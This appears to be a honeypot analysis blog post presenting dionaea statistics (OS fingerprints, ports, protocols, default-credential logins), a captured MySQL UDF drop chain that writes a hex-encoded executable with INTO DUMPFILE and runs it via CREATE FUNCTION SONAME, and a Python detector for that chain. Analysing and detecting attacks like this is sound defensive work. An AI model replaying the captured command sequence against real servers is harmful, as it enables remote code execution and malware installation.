I have also listed the SQL queries used to extract this information from the dionaea SQLite database.
p0f information
p0f is a passive OS fingerprinting tool: it analyzes network traffic to infer the remote operating system version, firewall presence, NAT usage, distance to the remote host (hop count) and the kind of link used.
FYI: you need to enable p0f in the dionaea configuration file and run the p0f tool alongside dionaea in order to collect this data.
select count(p0f_genre||p0f_detail) as count, (p0f_genre || ' ' || p0f_detail) as OS from p0fs group by (p0f_genre||p0f_detail) order by count desc;
count | OS
---|---
7509 | (empty: no p0f genre/detail recorded)
104 | Windows 2000 SP4, XP SP1+
46 | Windows XP/2000 (RFC1323+, w+, tstamp-)
31 | Windows 2000 SP2+, XP SP1+ (seldom 98)
17 | Linux 2.6 (newer, 3)
11 | Linux 2.6 (newer, 2)
8 | Windows XP SP1+, 2000 SP3
7 | Linux 2.4-2.6
6 | Windows XP/2000 (RFC1323+, w, tstamp+)
3 | Windows 95
2 | SunOS 4.1.x
1 | Linux 2.6? (barebone, rare!)
1 | Windows 98 (no sack)
select count(p0f_link) as count, p0f_link as link from p0fs group by p0f_link order by count desc;
count | link
---|---
6051 | (empty: no link type recorded)
1533 | ethernet/modem
101 | pppoe (DSL)
39 | IPv6/IPIP
10 | (Google/AOL)
5 | GPRS, T1, FreeS/WAN
3 | PIX, SMC, sometimes wireless
3 | sometimes DSL (2)
1 | vtun
Targeted local ports
select count(local_port) as count, local_port as "targeted port" from connections group by local_port order by count desc;
count | targeted port
---|---
1201 | 42
335 | 80
123 | 135
113 | 1433
87 | 32554
72 | 32045
61 | 5060
38 | 3389
38 | 8008
37 | 23
... | ...
18 | 445
... | ...
By port number, the most targeted services here are WINS (42), web servers (80), epmap/DCOM (135), SQL Server (1433), SIP (5060), RDP (3389) and Telnet (23). Note that the 1201 connections on port 42 match the 1201 mirrord entries in the protocol table below: dionaea's mirror service listens on port 42 by default and simply mirrors the connection back to the attacker, so these count as WINS probes only because of the port number.
Location of attackers / malware sources
select count(remote_host) as count, remote_host from connections group by remote_host order by count desc;
Looking at the map, we can see a lot of connections from France, but I can explain some of them: while the honeypot was running I launched some port scans myself. To keep the statistics reliable I removed the connections coming from my own IP from the SQLite database, but I have probably missed some of them.
Protocol information
select count(connection_transport) as count, connection_transport from connections group by connection_transport order by count desc;
count | connection_transport |
---|---|
6959 | tcp |
85 | udp |
13 | tls |
select count(connection_protocol) as count, connection_protocol from connections group by connection_protocol order by count desc;
count | connection_protocol |
---|---|
3929 | pcap |
1204 | mirrorc |
1201 | mirrord |
335 | httpd |
123 | epmapper |
113 | mssqld |
70 | SipSession |
54 | TftpClient |
17 | smbd |
7 | mysqld |
4 | SipCall |
Default passwords
select count(logins.login_username||logins.login_password) as count, logins.login_username, logins.login_password, connections.connection_protocol, connections.local_port from logins, connections where connections.connection = logins.connection group by (logins.login_username||logins.login_password) order by count desc;
count | login_username | login_password | connection_protocol | local_port
---|---|---|---|---
95 | sa | (empty) | mssqld | 1433
6 | root | (empty) | mysqld | 3306
Malware targeting my honeypot tried to connect to MySQL as root with an empty password, and to Microsoft SQL Server as sa with an empty password; both are default credentials.
MySQL commands
select * from mysql_command_args;
The output of this query is quite fun. It is a classic MySQL UDF drop chain, run over the root account with no password: the attacker first drops any leftovers from previous runs, creates a table with a LONGBLOB column, inserts a hex-encoded Windows PE file (0x4D5A... is the "MZ" header), writes it to disk with SELECT ... INTO DUMPFILE (trying several paths until one is writable: C:\, C:\WINDOWS, SYSTEM32, the plugin and bin directories), registers the dropped DLL as a user-defined function with CREATE FUNCTION ... SONAME, and finally calls that function to execute the dropped .exe and then delete it:
drop function cmdshell
drop function cmdshell
drop function my_udfdoor
drop function my_udfdoor
drop function do_system
drop function do_system
use mysql;
use mysql;
drop table if exists tempMix4;
drop table if exists tempMix4;
create table if not exists tempMix4(data LONGBLOB);
create table if not exists tempMix4(data LONGBLOB);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
INSERT INTO tempMix4 VALUES (@a);
select data from tempMix4 into DUMPFILE 'C:\\12345.exe';
drop table if exists tempMix4;
use mysql;
drop table if exists tempMix;
create table if not exists tempMix(data LONGBLOB);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
INSERT INTO tempMix VALUES (@a);
select data from tempMix into DUMPFILE 'C:\\WINDOWS\\amd.dll'
INSERT INTO tempMix4 VALUES (@a);
select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
select data from tempMix4 into DUMPFILE 'C:\\12345.exe';
select data from tempMix into DUMPFILE 'C:\\WINDOWS\\SYSTEM32\\amd.dll'
select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
select data from tempMix into DUMPFILE '..\\lib\\plugin\\amd.dll'
drop table if exists tempMix4;
select data from tempMix into DUMPFILE 'D:\\amd.dll'
use mysql;
select data from tempMix into DUMPFILE '..\\bin\\amd.dll'
drop table if exists tempMix;
create table if not exists tempMix(data LONGBLOB);
create function cmdshelv returns string soname 'amd.dll';
create function cmdshelv returns string soname 'amd.dll'
create function cmdshelv returns string soname 'C:\\WINDOWS\\system32\\amd.dll'
create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'
create function cmdshelv returns string soname 'C:\\WINDOWS\\SYSTEM32\\amd.dll';
create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll';
create function cmdshelv returns string soname 'amd.dll'
select cmdshelv('c:\\12345.exe')
select cmdshelv('c:\\12345.exe');
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
select cmdshelv('cmd.exe cmd/c del c:\12345.exe');
For more information, you can read this article: http://carnivore.it/2011/06/12/the_mysql_cmdshelv
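The commands above are easy to recognise automatically, because the chain always needs the same stages in the same connection: a hex blob starting with the "MZ" header, a SELECT ... INTO DUMPFILE, a CREATE FUNCTION ... SONAME, and a call to the newly created function. The following Python script is an added example, not part of the original post or of dionaea: it groups captured statements per connection and reports how far each connection got. The input shape (connection id, statement text) is an assumption modelled on a join of dionaea's connections and mysql_command_args tables; the sample statements are constructed from the log above.

```python
"""Flag MySQL UDF drop chains in captured command logs (added example)."""
import re
from collections import defaultdict

# Constructed sample input, shaped like (connection, mysql_command_arg_data)
# rows joined from the dionaea database (column names are an assumption).
SAMPLE_COMMANDS = [
    (1, "use mysql;"),
    (1, "create table if not exists tempMix(data LONGBLOB);"),
    (1, "set @a = concat('',0x4D5A90000300000004000000FFFF0000);"),
    (1, "INSERT INTO tempMix VALUES (@a);"),
    (1, r"select data from tempMix into DUMPFILE 'C:\\WINDOWS\\amd.dll'"),
    (1, "create function cmdshelv returns string soname 'amd.dll';"),
    (1, r"select cmdshelv('c:\\12345.exe');"),
    (2, "select @@version;"),           # ordinary client, nothing to flag
    (2, "show databases;"),
    (3, "create table t(data LONGBLOB);"),
    (3, "select data from t into DUMPFILE '/tmp/out.bin'"),  # file write only
]

# One regex per stage of the chain seen in the captured log.
RE_MZ_BLOB = re.compile(r"0x4d5a90", re.I)        # hex literal with a PE "MZ" header
RE_DUMPFILE = re.compile(r"into\s+dumpfile\s+'([^']+)'", re.I)
RE_UDF = re.compile(
    r"create\s+function\s+(\w+)\s+returns\s+\w+\s+soname\s+'([^']+)'", re.I)
RE_CALL = re.compile(r"select\s+(\w+)\s*\(", re.I)  # select <udf>(...)


def verdict(rec):
    """Rate one connection: full chain, a lone suspicious stage, or benign."""
    if rec["udf"] and (rec["dumpfile"] or rec["mz_blob"]):
        return "udf_backdoor"   # DLL written to disk, then loaded as a UDF
    if rec["dumpfile"] or rec["udf"] or rec["mz_blob"]:
        return "suspicious"     # a single stage on its own still merits a look
    return "benign"


def analyze(commands):
    """Group statements per connection and return the stages each reached.

    `commands` is an iterable of (connection_id, statement) pairs. Statements
    are processed in order, so a UDF call only counts once the function has
    been registered in the same connection."""
    per_conn = defaultdict(lambda: {
        "mz_blob": False, "dumpfile": [], "udf": {}, "udf_calls": []})
    for conn, stmt in commands:
        rec = per_conn[conn]
        if RE_MZ_BLOB.search(stmt):
            rec["mz_blob"] = True
        rec["dumpfile"].extend(RE_DUMPFILE.findall(stmt))
        for name, soname in RE_UDF.findall(stmt):
            rec["udf"][name.lower()] = soname
        call = RE_CALL.search(stmt)
        if call and call.group(1).lower() in rec["udf"]:
            rec["udf_calls"].append(stmt.strip())
    return {conn: {**rec, "verdict": verdict(rec)}
            for conn, rec in per_conn.items()}


def run_sample():
    """Analyze the constructed sample; returns the per-connection report."""
    return analyze(SAMPLE_COMMANDS)


if __name__ == "__main__":
    for conn, rec in sorted(run_sample().items()):
        print(f"connection {conn}: {rec['verdict']}"
              f" udf={rec['udf']} dumpfile={rec['dumpfile']}"
              f" calls={len(rec['udf_calls'])}")
```

To run it against a real capture, replace SAMPLE_COMMANDS with the rows of a query such as a join of connections and mysql_command_args on mysql_commands (check the column names against your dionaea schema). The DUMPFILE paths it extracts tell you where the attacker expected the plugin directory to be, which is useful when triaging a compromised server.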
RPC vulnerabilities
select dcerpcservices.dcerpcservice_name, dcerpcserviceops.dcerpcserviceop_name, dcerpcserviceops.dcerpcserviceop_vuln from dcerpcservices, dcerpcserviceops where dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice and dcerpcserviceops.dcerpcserviceop_vuln <> '';
dcerpcservice_name | dcerpcserviceop_name | dcerpcserviceop_vuln |
---|---|---|
DCOM | RemoteActivation | MS03-26 |
DSSETUP | DsRolerUpgradeDownlevelServer | MS04-11 |
ISystemActivator | RemoteCreateInstance | MS04-12 |
MSMQ | QMCreateObjectInternal | MS07-065 |
MSMQ | QMDeleteObject | MS05-017 |
NWWKS | NwChangePassword | MS06-66 |
NWWKS | NwOpenEnumNdsSubTrees | MS06-66 |
PNP | PNP_QueryResConfList | MS05-39 |
SRVSVC | NetPathCanonicalize | MS08-67 |
SRVSVC | NetPathCompare | MS08-67 |
WKSSVC | NetAddAlternateComputerName | MS03-39 |
nddeapi | NDdeSetTrustedShareW | MS04-031 |
Malware URLs
select downloads.download_url, downloads.download_md5_hash,connections.local_port from downloads, connections where downloads.connection=connections.connection;
All the malware was downloaded from TFTP servers and is linked to connections on port 135. Since the URLs point to live malware, I won't show them here.
Virustotal reports
select virustotal_permalink from virustotals;
http://www.virustotal.com/file-scan/report.html?id=1a934b461b5c40172958415928b23ae6b75bf194ecb1927ce09c30b765f09d92-1312716887
http://www.virustotal.com/file-scan/report.html?id=badf757dbbcb192bceb0ac9e2c949dfbe3d2a1022a6017ab3be611053f6412ef-1299403039
http://www.virustotal.com/file-scan/report.html?id=cdcfa06de82598a06d3eba5259306a5caccfbf0265625ad65de8de2620e17131-1312716944
http://www.virustotal.com/file-scan/report.html?id=4f226d64e7083b0cb7e36076edd76520498e95cb24380bbd469b13e46096b7ad-1312716946
http://www.virustotal.com/file-scan/report.html?id=273040d07e3d2c1153967015fa069de7e3086163651babcc07ab321b289d70d5-1314124477
http://www.virustotal.com/file-scan/report.html?id=922a7d3c82c4782f9795a82271df3be8628eefa6a0fa104caad7472772f5e43e-1312713825
http://www.virustotal.com/file-scan/report.html?id=ec9b2bf6a6fdb2aa5b699ea897925e2e3b152aecc6db28c47992607871a50c28-1312713850
http://www.virustotal.com/file-scan/report.html?id=dc64e5eb25f14b17b415a1c73523e0825d6f79a8b0f47194c097028d1dc93003-1310608851
http://www.virustotal.com/file-scan/report.html?id=9f932547a0f1050fcc06513b1701d817c201904820b710daa2d8907e19383b6a-1307217666
http://www.virustotal.com/file-scan/report.html?id=878949d20c4c07cbe21e96f24d77e8c3387e8fc65e60250138ab94ee5d3fb561-1312713864
http://www.virustotal.com/file-scan/report.html?id=137d09a12f04cfee5dbd0e98422a127f8ca7bc1d26c118be067251a456afecdc-1314040714
http://www.virustotal.com/file-scan/report.html?id=83c334585c33b1996697cc0ff5f7b131b065628c2dc6f4c81a0ea9e1a341baf7-1310796380
All these URLs are VirusTotal reports for the malware captured by my honeypot. Most of the samples were submitted to VirusTotal this summer. According to the reports, they are all IRC bots. Since the detection rate at scan time was high (between 93% and 98%), they are not a major threat to a protected computer as long as the user does not do anything careless.
Damn, I just found these in my MySQL dir...
-rw-rw-rw- 1 mysql mysql 32482 2012-06-06 19:09 \usr\lib\mysql\plugin\mmsql.dll
-rw-rw-rw- 1 mysql mysql 164 2012-06-06 19:09 c:\docume~1\alluse~1\????ʼ???˵?\????\????\a.vbs
-rw-rw-rw- 1 mysql mysql 196608 2012-06-07 20:01 C:\18181.exe
-rw-rw-rw- 1 mysql mysql 40960 2012-06-07 20:01 C:\WINDOWS\amd.dll
-rw-rw-rw- 1 mysql mysql 40960 2012-06-07 20:01 C:\WINT\amd.dll
-rw-rw-rw- 1 mysql mysql 40960 2012-06-07 20:01 C:\WINDOWS\SYSTEM32\amd.dll
-rw-rw-rw- 1 mysql mysql 40960 2012-06-07 20:01 C:\amd.dll
-rw-rw-rw- 1 mysql mysql 63501 2012-07-19 06:07 C:\11188.exe
Ubuntu 12.04, admittedly not very secure.
No evidence in bash_history or mysql_history.
Any advice?